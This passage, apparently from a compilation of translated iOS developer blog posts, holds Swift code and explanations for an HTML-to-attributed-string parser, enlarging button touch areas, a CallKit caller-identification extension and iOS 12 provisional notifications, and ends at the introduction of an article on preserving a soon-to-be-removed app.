            tagRender.storedHTMLAttributes = attributes
            renderingTagRenders.append(tagRender)
        }
    }

    func exit(element elementName: String) {
        if !renderingTagRenders.isEmpty {
            renderingTagRenders.removeLast()
        }
    }

    func foundNewString() {
        if let currentString = currentString {
            // currentString != nil, ex: <i>currentString</i>
            var newAttributedString = NSMutableAttributedString(string: currentString)
            if !renderingTagRenders.isEmpty {
                for (key, tagRender) in renderingTagRenders.enumerated() {
                    // Render Style
                    tagRender.render(attributedString: &newAttributedString)
                    renderingTagRenders[key].storedHTMLAttributes = nil
                }
            } else {
                defaultStyle.render(attributedString: &newAttributedString)
            }
            attributedString.append(newAttributedString)
            self.currentString = nil
        } else {
            // currentString == nil, ex: <br/>
            var newAttributedString = NSMutableAttributedString()
            for (key, tagRender) in renderingTagRenders.enumerated() {
                // Render Style
                tagRender.render(attributedString: &newAttributedString)
                renderingTagRenders[key].storedHTMLAttributes = nil
            }
            attributedString.append(newAttributedString)
        }
    }
}

// MARK: Helper

extension HTMLToAttributedStringParser {
    // handle html entity / html hex
    // Perform string escaping to replace all characters which are not supported by NSXMLParser
    // into the specified encoding with decimal entity.
    // For example if your string contains the '&' character the parser will break the style.
    // This option is active by default.
    // ref: https://github.com/malcommac/SwiftRichString/blob/e0b72d5c96968d7802856d2be096202c9798e8d1/Sources/SwiftRichString/Support/XMLStringBuilder.swift
    static func escapeWithUnicodeEntities(_ string: String) -> String {
        guard let escapeAmpRegExp = try? NSRegularExpression(pattern: "&(?!(#[0-9]{2,4}|[A-z]{2,6});)", options: NSRegularExpression.Options(rawValue: 0)) else {
            return string
        }

        let range = NSRange(location: 0, length: string.utf16.count)
        return escapeAmpRegExp.stringByReplacingMatches(in: string,
                                                        options: NSRegularExpression.MatchingOptions(rawValue: 0),
                                                        range: range,
                                                        withTemplate: "&amp;")
    }
}

// MARK: XMLParserDelegate

extension HTMLToAttributedStringParser: XMLParserDelegate {
    func parser(_ parser: XMLParser, didStartElement elementName: String, namespaceURI: String?, qualifiedName qName: String?, attributes attributeDict: [String: String]) {
        foundNewString()
        enter(element: elementName, attributes: attributeDict)
    }

    func parser(_ parser: XMLParser, didEndElement elementName: String, namespaceURI: String?, qualifiedName qName: String?) {
        foundNewString()
        guard elementName != HTMLToAttributedStringParser.topTag else {
            return
        }

        exit(element: elementName)
    }

    func parser(_ parser: XMLParser, foundCharacters string: String) {
        currentString = (currentString ?? "").appending(string)
    }
}
Applying the same logic as stripping, we can assemble the parsed structure: elementName tells us the current tag, and we apply the corresponding Tag Parser with its defined style.
let test = "我<br/><a href=\"http://google.com\">同意</a>提供<b><i>個</i>人</b>身分證字號/護照/居留<span style=\"color:#FF0000;font-size:20px;word-spacing:10px;line-height:10px\">證號碼</span>,以供<i>跨境物流</i>方通關<span style=\"background-color:#00FF00;\">使用</span>,並已<img src=\"g.png\"/>了解跨境<br/>商品之物<p>流需</p>求"
let render = HTMLToAttributedStringParser(defaultStyle: DefaultTextStyle())
render.register(ATagParser())
render.register(BoldTagParser())
render.register(SpanTagParser())
// DefaultTextStyle / SpanTagParser (and parsers for other tags) are declared the same way as the styles and parsers above; omitted here.
//...
print(try! render.parse(string: test))

// Result:
// 我{
// NSColor = "UIExtendedGrayColorSpace 0 1";
// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
// }同意{
// NSColor = "UIExtendedSRGBColorSpace 0 0 1 1";
// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
// NSLink = "http://google.com";
// NSUnderline = 1;
// }提供{
// NSColor = "UIExtendedGrayColorSpace 0 1";
// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
// }個{
// NSColor = "UIExtendedGrayColorSpace 0 1";
// NSFont = "\".SFNS-Bold 14.00 pt. P [] (0x13a013870) fobj=0x13a013870, spc=3.46\"";
// NSUnderline = 1;
// }人身分證字號/護照/居留{
// NSColor = "UIExtendedGrayColorSpace 0 1";
// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
// }證號碼{
// NSColor = "UIExtendedSRGBColorSpace 1 0 0 1";
// NSFont = "\".SFNS-Regular 20.00 pt. P [] (0x13a015fa0) fobj=0x13a015fa0, spc=4.82\"";
// NSKern = 10;
// NSParagraphStyle = "Alignment 4, LineSpacing 10, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
// },以供跨境物流方通關{
// NSColor = "UIExtendedGrayColorSpace 0 1";
// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
// }使用{
// NSBackgroundColor = "UIExtendedSRGBColorSpace 0 1 0 1";
// NSColor = "UIExtendedGrayColorSpace 0 1";
// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
// },並已了解跨境商品之物流需求{
// NSColor = "UIExtendedGrayColorSpace 0 1";
// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
// }
Display Result:
We have now completed the HTML render function using XMLParser, keeping it both extensible and tied to a specification; from the code alone we can see and manage exactly which kinds of string rendering the current app supports.
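As a usage sketch, hooking the result up to a UILabel could look like this (the HTML string is arbitrary, and DefaultTextStyle is the default style type registered in the example above):

// Usage sketch: render a server-provided HTML snippet into a UILabel.
let html = "我<b>同意</b>提供<a href=\"http://google.com\">個人資料</a>"
let render = HTMLToAttributedStringParser(defaultStyle: DefaultTextStyle())
render.register(ATagParser())
render.register(BoldTagParser())

let label = UILabel()
label.numberOfLines = 0
label.attributedText = try? render.parse(string: html)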
This article is also published on my personal Blog: [Click here to visit].
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Rewrite pointInside to expand the touch area
In daily development, it is often encountered that after arranging the UI according to the design, the screen looks beautiful, but the actual operation shows that the button’s touch area is too small, making it difficult to click accurately; especially unfriendly to people with thick fingers.
Completed Example
Initially, I didn’t delve deeply into this issue and directly overlaid a larger transparent UIButton on the original button, using this transparent button to respond to events. This approach was very cumbersome and difficult to control when there were many components.
Later, I solved it with layout: constrain the button flush (0 or lower) on all sides, then use the imageEdgeInsets, titleEdgeInsets, and contentEdgeInsets parameters to push the icon/button title to the correct position in the UI design. However, this method is better suited to projects using Storyboard/xib, because you can nudge the layout directly in Interface Builder. Also, the supplied icon should ideally have no built-in padding, otherwise it is hard to align; sometimes it gets stuck at that last 0.5 pt and never lines up no matter how you adjust it.
As the saying goes, “seeing more broadens the mind.” Recently, after encountering a new project, I learned a small trick; you can increase the event response range in UIButton’s pointInside. By default, it is UIButton’s Bounds, but we can extend the Bounds size inside to make the button’s clickable area larger!
class MyButton: UIButton {
    var touchEdgeInsets: UIEdgeInsets?
    override open func point(inside point: CGPoint, with event: UIEvent?) -> Bool {
        var frame = self.bounds

        if let touchEdgeInsets = self.touchEdgeInsets {
            frame = frame.inset(by: touchEdgeInsets)
        }

        return frame.contains(point)
    }
}
Customize a UIButton, adding a touchEdgeInsets property to store the range to expand, making it convenient to use; then override point(inside:with:) to implement the idea above.
import UIKit

class MusicViewController: UIViewController {

    @IBOutlet weak var playerButton: MyButton!

    override func viewDidLoad() {
        super.viewDidLoad()

        playerButton.touchEdgeInsets = UIEdgeInsets(top: -10, left: -10, bottom: -10, right: -10)
    }

}
Play Button/Blue is the original click area/Red is the expanded click area
When using it, just remember to set the button's class to our custom MyButton; then you can expand the click area of individual buttons by setting touchEdgeInsets!
️⚠️⚠️⚠️⚠️️️️⚠️️️️
When using Storyboard/xib, remember to set Custom Class to MyButton
⚠️⚠️⚠️⚠️⚠️
touchEdgeInsets insets the bounds inward by default, so to extend the touch area outward, the top, bottom, left, and right values should be negative numbers.
Replacing every UIButton with a custom MyButton is quite cumbersome and increases the complexity of the program. It might even cause conflicts in large projects.
For functionalities that we believe all UIButtons should inherently have, if possible, we would prefer to directly extend the original UIButton:
import UIKit

private var buttonTouchEdgeInsets: UIEdgeInsets?

extension UIButton {
    var touchEdgeInsets: UIEdgeInsets? {
        get {
            return objc_getAssociatedObject(self, &buttonTouchEdgeInsets) as? UIEdgeInsets
        }

        set {
            objc_setAssociatedObject(self,
                                     &buttonTouchEdgeInsets, newValue,
                                     .OBJC_ASSOCIATION_RETAIN_NONATOMIC)
        }
    }

    override open func point(inside point: CGPoint, with event: UIEvent?) -> Bool {
        var frame = self.bounds

        if let touchEdgeInsets = self.touchEdgeInsets {
            frame = frame.inset(by: touchEdgeInsets)
        }

        return frame.contains(point)
    }
}
Use it as described in the previous usage example. Since extensions cannot contain stored properties (you would get the compile error "Extensions must not contain stored properties"), we use an Associated Object to attach the external variable buttonTouchEdgeInsets to our extension, allowing it to be used like a regular property. (For the detailed principle, please refer to Mao Da's article.)
For image clicks, we usually add a tap gesture to the view; similarly, we can achieve the same effect by overriding UIImageView's point(inside:with:).
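A minimal sketch of that idea (the class name and inset values are arbitrary):

import UIKit

// Sketch: a UIImageView whose tappable area is 10 pt larger on every side.
class TappableImageView: UIImageView {
    var touchEdgeInsets = UIEdgeInsets(top: -10, left: -10, bottom: -10, right: -10)

    override func point(inside point: CGPoint, with event: UIEvent?) -> Bool {
        return bounds.inset(by: touchEdgeInsets).contains(point)
    }
}

// Usage (inside a view controller), remembering that image views ignore touches by default:
// imageView.isUserInteractionEnabled = true
// imageView.addGestureRecognizer(UITapGestureRecognizer(target: self, action: #selector(didTapImage)))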
Done! After continuous improvements, solving this issue has become much simpler and more convenient!
UIView Change Touch Range (Objective-C)
Around the same time last year, I wanted to start a small category “ Small things make big things “ to record the trivial daily development tasks. These small tasks, when accumulated, can significantly improve the overall APP experience or the program itself. However, after a year, I only added one more article <( _ _ )>. Small tasks are really easy to forget to record!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
iOS DIY Whoscall Call Identification and Phone Number Tagging Features
I have always been a loyal user of Whoscall. I used it when I originally had an Android phone, and it could display unknown caller information very promptly, allowing me to decide whether to answer the call immediately. Later, I switched to the Apple camp, and my first Apple phone was the iPhone 6 (iOS 9). At that time, using Whoscall was very awkward; it couldn’t identify calls in real-time, and I had to copy the phone number to the app for inquiry. Later, Whoscall provided a service to install the unknown phone number database locally on the phone, which solved the real-time identification problem but easily messed up my phone contacts!
Until iOS 10+ when Apple opened the call identification feature (Call Directory Extension) permissions to developers, Whoscall’s experience at least matched the Android version, if not surpassed it (the Android version has a lot of ads, but from a developer’s standpoint, it’s understandable).
What can the Call Directory Extension do?
“Settings” -> “Phone” -> “Call Blocking & Identification”
The calls made by users are all representative numbers of the transfer center (#extension), and they will not know the real phone number; on one hand, it protects personal privacy, and on the other hand, it allows us to know how many people contacted the store (evaluate effectiveness) and even know where they saw it before calling (e.g., webpage shows #1234, app shows #5678). It also allows us to offer free services by absorbing the phone communication costs.
However, this approach brings an unavoidable problem: messy phone numbers. Users cannot tell who a call is from, and when the store calls back, they don't know who the caller is. Using the call identification feature largely solves this problem and improves the user experience!
You can see that when entering the phone number, the recognition result can be directly displayed during the call, and the call history list is no longer messy and can display the recognition result at the bottom.
Let’s start working!
Xcode -> File -> New -> Target
Select Call Directory Extension
Enter Extension Name
Optionally add Scheme for easier Debugging
A folder and program for Call Directory Extension will appear under the directory
First, return to the main iOS project
The first question is how do we determine if the user’s device supports Call Directory Extension or if the “Call Blocking & Identification” in the settings is turned on:
import CallKit
//
//......
//
if #available(iOS 10.0, *) {
    CXCallDirectoryManager.sharedInstance.getEnabledStatusForExtension(withIdentifier: "Enter the bundle identifier of the call directory extension here", completionHandler: { (status, error) in
        if status == .enabled {
            //Enabled
        } else if status == .disabled {
            //Disabled
        } else {
            //Unknown, not supported
        }
    })
}
As mentioned earlier, the way call recognition works is to maintain a local recognition database; so how do we achieve this function?
Unfortunately, you cannot directly call and write data to the Call Directory Extension, so you need to maintain an additional corresponding structure, and then the Call Directory Extension will read your structure and write it into the recognition database. The process is as follows:
This means we need to maintain our own database file, and then let the Extension read and write it into the phone
So what should the recognition data/file look like?
It is actually a Dictionary structure, such as: [“Phone”:”Wang Da Ming”]
For the local file you can use any local DB (as long as the Extension can also bundle and use it); here we simply store a .json file on the phone. Storing the data directly in UserDefaults is not recommended: it is fine for testing or for very small data sets, but strongly discouraged for real applications!
Okay, let’s start:
if #available(iOS 10.0, *) {
    if let dir = FileManager.default.containerURL(forSecurityApplicationGroupIdentifier: "Your cross-Extension, Group Identifier name") {
        let fileURL = dir.appendingPathComponent("phoneIdentity.json")
        var datas: [String: String] = ["8869190001234": "Mr. Li", "886912002456": "Handsome"]
        if let content = try? String(contentsOf: fileURL, encoding: .utf8), let text = content.data(using: .utf8), let json2 = try? JSONSerialization.jsonObject(with: text, options: .mutableContainers) as? Dictionary<String, String>, let json = json2 {
            datas = json
        }
        // jsonToData: a helper defined elsewhere in the project that serializes the dictionary (e.g. with JSONSerialization)
        if let data = jsonToData(jsonDic: datas) {
            DispatchQueue(label: "phoneIdentity").async {
                if let _ = try? data.write(to: fileURL) {
                    //Writing json file completed
                }
            }
        }
    }
}
This is just general local file maintenance; note that the file must live in a directory (the shared App Group container) that the Extension can read as well.
// Call Directory phone numbers are purely numeric and include the country code (e.g. Taiwan 886):
// replace the leading 0 with the country code and strip symbols such as ","
var newNumber = "0255667788,0718"
if let regex = try? NSRegularExpression(pattern: "^0{1}") {
    newNumber = regex.stringByReplacingMatches(in: newNumber, options: [], range: NSRange(location: 0, length: newNumber.count), withTemplate: "886")
}
if let regex = try? NSRegularExpression(pattern: ",") {
    newNumber = regex.stringByReplacingMatches(in: newNumber, options: [], range: NSRange(location: 0, length: newNumber.count), withTemplate: "")
}
Next, as per the process, once the identification data is maintained, you need to notify the Call Directory Extension to refresh the data on the phone:
if #available(iOS 10.0, *) {
    CXCallDirectoryManager.sharedInstance.reloadExtension(withIdentifier: "tw.com.marry.MarryiOS.CallDirectory") { errorOrNil in
        if let error = errorOrNil as? CXErrorCodeCallDirectoryManagerError {
            print("reload failed")

            switch error.code {
            case .unknown:
                print("error is unknown")
            case .noExtensionFound:
                print("error is noExtensionFound")
            case .loadingInterrupted:
                print("error is loadingInterrupted")
            case .entriesOutOfOrder:
                print("error is entriesOutOfOrder")
            case .duplicateEntries:
                print("error is duplicateEntries")
            case .maximumEntriesExceeded:
                print("maximumEntriesExceeded")
            case .extensionDisabled:
                print("extensionDisabled")
            case .currentlyLoading:
                print("currentlyLoading")
            case .unexpectedIncrementalRemoval:
                print("unexpectedIncrementalRemoval")
            }
        } else if let error = errorOrNil {
            print("reload error: \(error)")
        } else {
            print("reload succeeded")
        }
    }
}
Use the above method to notify the Extension to refresh and obtain the execution result. (At this time, the beginRequest in the Call Directory Extension will be called, please continue reading)
The main iOS project code ends here!
Open the Call Directory Extension directory and find the file CallDirectoryHandler.swift that has been created for you.
The only method that can be implemented is beginRequest for handling actions when processing phone data. The default examples are already set up for us, so there’s not much need to change them:
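For context, the template's entry point looks roughly like this (reproduced approximately and trimmed to the identification part; it simply dispatches to the helper functions implemented below):

import CallKit

// Approximate shape of the Xcode template's CallDirectoryHandler (trimmed).
class CallDirectoryHandler: CXCallDirectoryProvider {

    override func beginRequest(with context: CXCallDirectoryExtensionContext) {
        context.delegate = self

        if context.isIncremental {
            // Only apply changes since the last successful load.
            addOrRemoveIncrementalIdentificationPhoneNumbers(to: context)
        } else {
            // First load or full reload: add every identification entry.
            addAllIdentificationPhoneNumbers(to: context)
        }

        context.completeRequest()
    }
}

extension CallDirectoryHandler: CXCallDirectoryExtensionContextDelegate {
    func requestFailed(for extensionContext: CXCallDirectoryExtensionContext, withError error: Error) {
        // Called when the system rejects the loaded entries (e.g. out-of-order or duplicate numbers).
    }
}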
We just need to complete the implementation of the above functions. The principles for blacklist functionality and caller identification are the same, so they won’t be introduced in detail here.
private func fetchAll(context: CXCallDirectoryExtensionContext) {
    if let dir = FileManager.default.containerURL(forSecurityApplicationGroupIdentifier: "Your App Group Identifier") {
        let fileURL = dir.appendingPathComponent("phoneIdentity.json")
        if let content = try? String(contentsOf: fileURL, encoding: .utf8), let text = content.data(using: .utf8), let numbers = try? JSONSerialization.jsonObject(with: text, options: .mutableContainers) as? Dictionary<String, String> {
            numbers?.sorted(by: { (Int($0.key) ?? 0) < Int($1.key) ?? 0 }).forEach({ (obj) in
                if let number = CXCallDirectoryPhoneNumber(obj.key) {
                    autoreleasepool {
                        if context.isIncremental {
                            context.removeIdentificationEntry(withPhoneNumber: number)
                        }
                        context.addIdentificationEntry(withNextSequentialPhoneNumber: number, label: obj.value)
                    }
                }
            })
        }
    }
}

private func addAllIdentificationPhoneNumbers(to context: CXCallDirectoryExtensionContext) {
    // Retrieve phone numbers to identify and their identification labels from data store. For optimal performance and memory usage when there are many phone numbers,
    // consider only loading a subset of numbers at a given time and using autorelease pool(s) to release objects allocated during each batch of numbers which are loaded.
    //
    // Numbers must be provided in numerically ascending order.
    // let allPhoneNumbers: [CXCallDirectoryPhoneNumber] = [ 1_877_555_5555, 1_888_555_5555 ]
    // let labels = [ "Telemarketer", "Local business" ]
    //
    // for (phoneNumber, label) in zip(allPhoneNumbers, labels) {
    //     context.addIdentificationEntry(withNextSequentialPhoneNumber: phoneNumber, label: label)
    // }
    fetchAll(context: context)
}

private func addOrRemoveIncrementalIdentificationPhoneNumbers(to context: CXCallDirectoryExtensionContext) {
    // Retrieve any changes to the set of phone numbers to identify (and their identification labels) from data store. For optimal performance and memory usage when there are many phone numbers,
    // consider only loading a subset of numbers at a given time and using autorelease pool(s) to release objects allocated during each batch of numbers which are loaded.
    // let phoneNumbersToAdd: [CXCallDirectoryPhoneNumber] = [ 1_408_555_5678 ]
    // let labelsToAdd = [ "New local business" ]
    //
    // for (phoneNumber, label) in zip(phoneNumbersToAdd, labelsToAdd) {
    //     context.addIdentificationEntry(withNextSequentialPhoneNumber: phoneNumber, label: label)
    // }
    //
    // let phoneNumbersToRemove: [CXCallDirectoryPhoneNumber] = [ 1_888_555_5555 ]
    //
    // for phoneNumber in phoneNumbersToRemove {
    //     context.removeIdentificationEntry(withPhoneNumber: phoneNumber)
    // }

    //context.removeIdentificationEntry(withPhoneNumber: CXCallDirectoryPhoneNumber("886277283610")!)
    //context.addIdentificationEntry(withNextSequentialPhoneNumber: CXCallDirectoryPhoneNumber("886277283610")!, label: "TEST")

    fetchAll(context: context)
    // Record the most-recently loaded set of identification entries in data store for the next incremental load...
}
Because my data volume is small and my local data structure is very simple, incremental updates are not practical here, so we simply reload the complete data set every time. If you do use the incremental method, you must remove the old entries first (this step is very important, otherwise reloading the extension will fail!).
That’s it! The implementation is very simple!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Introduction to UserNotifications Provisional Authorization and iOS 12 Silent Notifications
Recently, I was improving the low permission and click-through rates of APP push notifications and made some optimizations. The initial version had a very poor experience; as soon as the APP was installed and launched, it directly popped up a window asking “APP wants to send notifications.” Naturally, the rejection rate was very high. According to the statistics from the previous article using Notification Service Extension, it is estimated that only about 10% of users allowed push notifications.
Currently, the new installation guide process has been adjusted, and the timing of the notification permission window has been optimized as follows:
If the user is still hesitant or wants to try the APP before deciding whether to receive notifications, they can click “Skip” in the upper right corner to avoid the irreversible result of pressing “Don’t Allow” due to unfamiliarity with the APP at the beginning.
While working on the above optimization, I discovered that UserNotifications in iOS 12 added a new .provisional permission. In plain language, it is a temporary notification permission that allows sending push notifications (silent notifications) to users without popping up a notification permission window. Let’s see the actual effect and limitations.
if #available(iOS 12.0, *) {
    let center = UNUserNotificationCenter.current()
    let permissions: UNAuthorizationOptions = [.badge, .alert, .sound, .provisional]
    // You can request only provisional permission .provisional, or request all necessary permissions at once XD
    // It will not trigger the notification permission prompt
    
    center.requestAuthorization(options: permissions) { (granted, error) in
        print(granted)
    }
}
We add the above code to AppDelegate didFinishLaunchingWithOptions and then open the APP. We will find that the notification permission window does not pop up. At this time, we go to Settings to check APP Notification Settings.
(Figure 1) Obtaining Silent Notification Permission
We have quietly obtained the silent notification permission 🏆
In the code, add the authorizationStatus .provisional item (only for iOS 12 and later) to determine the current push notification permission:
if #available(iOS 10.0, *) {
    UNUserNotificationCenter.current().getNotificationSettings { (settings) in
        if settings.authorizationStatus == .authorized {
            // Allowed
        } else if settings.authorizationStatus == .denied {
            // Not allowed
        } else if settings.authorizationStatus == .notDetermined {
            // Not asked yet
        } else if #available(iOS 12.0, *) {
            if settings.authorizationStatus == .provisional {
                // Currently provisional permission
            }
        }
    }
}
Note! When checking the current notification permission status, both settings.authorizationStatus == .notDetermined and settings.authorizationStatus == .provisional are states in which the prompt asking the user whether to allow notifications can still be triggered.
Let’s start with a diagram summarizing when silent notifications will be displayed:
As you can see, if it is a silent push notification, when the app is in the background state, the notification will not show a banner, will not have a sound alert, cannot be marked, and will not appear on the lock screen. It will only appear in the notification center when the phone is unlocked:
You can see the push notifications you sent, and they will automatically aggregate into a category.
After clicking to expand, the user can choose:
This expanded prompt window will only appear under silent push with “provisional permission.”
Silent notifications are a notification-optimization setting introduced in iOS 12 and are unrelated to provisional permission; it's just that an app holding provisional permission delivers its notifications silently. Setting an app's notifications to silent is also very simple. One way is to go to "Settings" - "Notifications" - find the app and turn off every permission except "Notification Center" (as shown in the first image); that is silent notification. Alternatively, when receiving an app notification, press/long-press to expand it, tap the "…" at the top right, and choose to deliver notifications silently:
Remove the .provisional part when requesting notification permissions to ask the user normally whether to allow notifications:
if #available(iOS 10.0, *) {
    let center = UNUserNotificationCenter.current()
    let permissions: UNAuthorizationOptions = [.badge, .alert, .sound]
    center.requestAuthorization(options: permissions) { (granted, error) in
        print(granted)
    }
}
Press “Allow” to get all notification permissions, press “Don’t Allow” to turn off all notification permissions (including the previously obtained silent notification permissions).
This thoughtful notification optimization in iOS 12 makes it easier to build an interactive bridge between users and developers regarding notification functionality, minimizing the chances of notifications being permanently turned off.
For users, when the notification prompt window pops up, they often don’t know whether to press allow or deny because they don’t know what kind of notifications the developer will send. It could be ads or important messages. The unknown is scary, so most people will conservatively press deny.
For developers, we have carefully prepared many items, including important messages to push to users, but due to the above issue, users block them, and our thoughtfully designed copy goes to waste!
This feature allows developers to seize the opportunity when users first install the app, design the push process and content well, prioritize pushing items of interest to users, increase users’ awareness of the app’s notifications, and track push click rates, then trigger the prompt asking users whether to allow notifications at the right time.
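Put together, the flow described above could look something like this (a sketch under those assumptions; the trigger point for the full prompt is up to your product design):

import UserNotifications

// 1. At first launch: get provisional (silent) delivery without showing any prompt.
func requestProvisionalAuthorization() {
    if #available(iOS 12.0, *) {
        UNUserNotificationCenter.current()
            .requestAuthorization(options: [.badge, .alert, .sound, .provisional]) { granted, _ in
                print("provisional granted: \(granted)")
            }
    }
}

// 2. Later, at a high-engagement moment, upgrade to full notifications with the real prompt.
func requestFullAuthorizationWhenEngaged() {
    let center = UNUserNotificationCenter.current()
    center.getNotificationSettings { settings in
        // Only ask if the user has not already made a final decision.
        guard settings.authorizationStatus != .authorized, settings.authorizationStatus != .denied else { return }
        center.requestAuthorization(options: [.badge, .alert, .sound]) { granted, _ in
            print("full authorization granted: \(granted)")
        }
    }
}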
Although the only exposure is in the Notification Center, having exposure means having a chance. From another perspective, if we were users and didn’t allow notifications, and the app could still send a bunch of notifications with banners, sounds, and appearing on the unlock screen, it would be very annoying (like the other camp XD). Apple’s approach strikes a balance between users and developers.
The current issue is probably… there are still too few iOS 12 users 🤐
In practice, I have “canceled” the implementation of this feature.
Why?
Because it was found that users can passively end up in silent notification mode in certain situations and then have to manually turn all the push notification permissions (banners, sounds, badges) back on.
It's a bit awkward: if the user denies the permission prompt and later re-enables notifications in Settings, only the silent notification permission is turned on, and asking the user to also enable banners, sounds, and badges is difficult; so for now the feature has been temporarily disabled.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Using mitmproxy + apple configurator to keep an App in its pre-removal state forever
Jujutsu Kaisen
After working for a long time and handling many products, I have started to encounter products that I once participated in reaching their end (removal). Developing a product from scratch is like nurturing a new life, with the team working together for 3-4 months to bring the child into the world. Although it was later handed over to other caretakers (engineers) for further development, hearing that it is about to reach the end of its product lifecycle still brings some regret.
Life is like this too. We never know if the sun will rise first tomorrow or if an accident will happen. The only thing we can do is cherish the present and do things well.
Every step leaves a trace. We hope to do something before the product reaches its end so that everyone still has a chance to remember it and at least leave proof of its existence. The following methods require the App to still be online; if it has already been removed, then only memories remain.
Besides using the iPhone’s built-in screen recording feature, we can also use QuickTime Player to connect the phone to a Mac for recording and exporting videos.
Click the “🔴” to start recording, and operate the content you want to record on the phone.
During recording, the current video size will be displayed. To stop recording, press the “🔴” again.
You can use the QuickTime Player toolbar to simply trim the video. Finally, press “Command” + “s” to export and save the video to the specified location, completing the recording for commemoration.
The advantage of video commemoration is that future memories are more easily connected than with pictures. The deeper you record, the more detailed the record. If you want to convert specific frames into pictures, you can directly take screenshots, which is very convenient.
Technical backup of an App can be divided into two directions: “bones” and “meat”. The App itself is just a skeleton, while the core content data of the App is composed of API Response Data.
Therefore, we also divide the technical backup into bones and meat.
This article is for technical research and sharing only. It does not encourage the use of any technology for illegal or infringing activities.
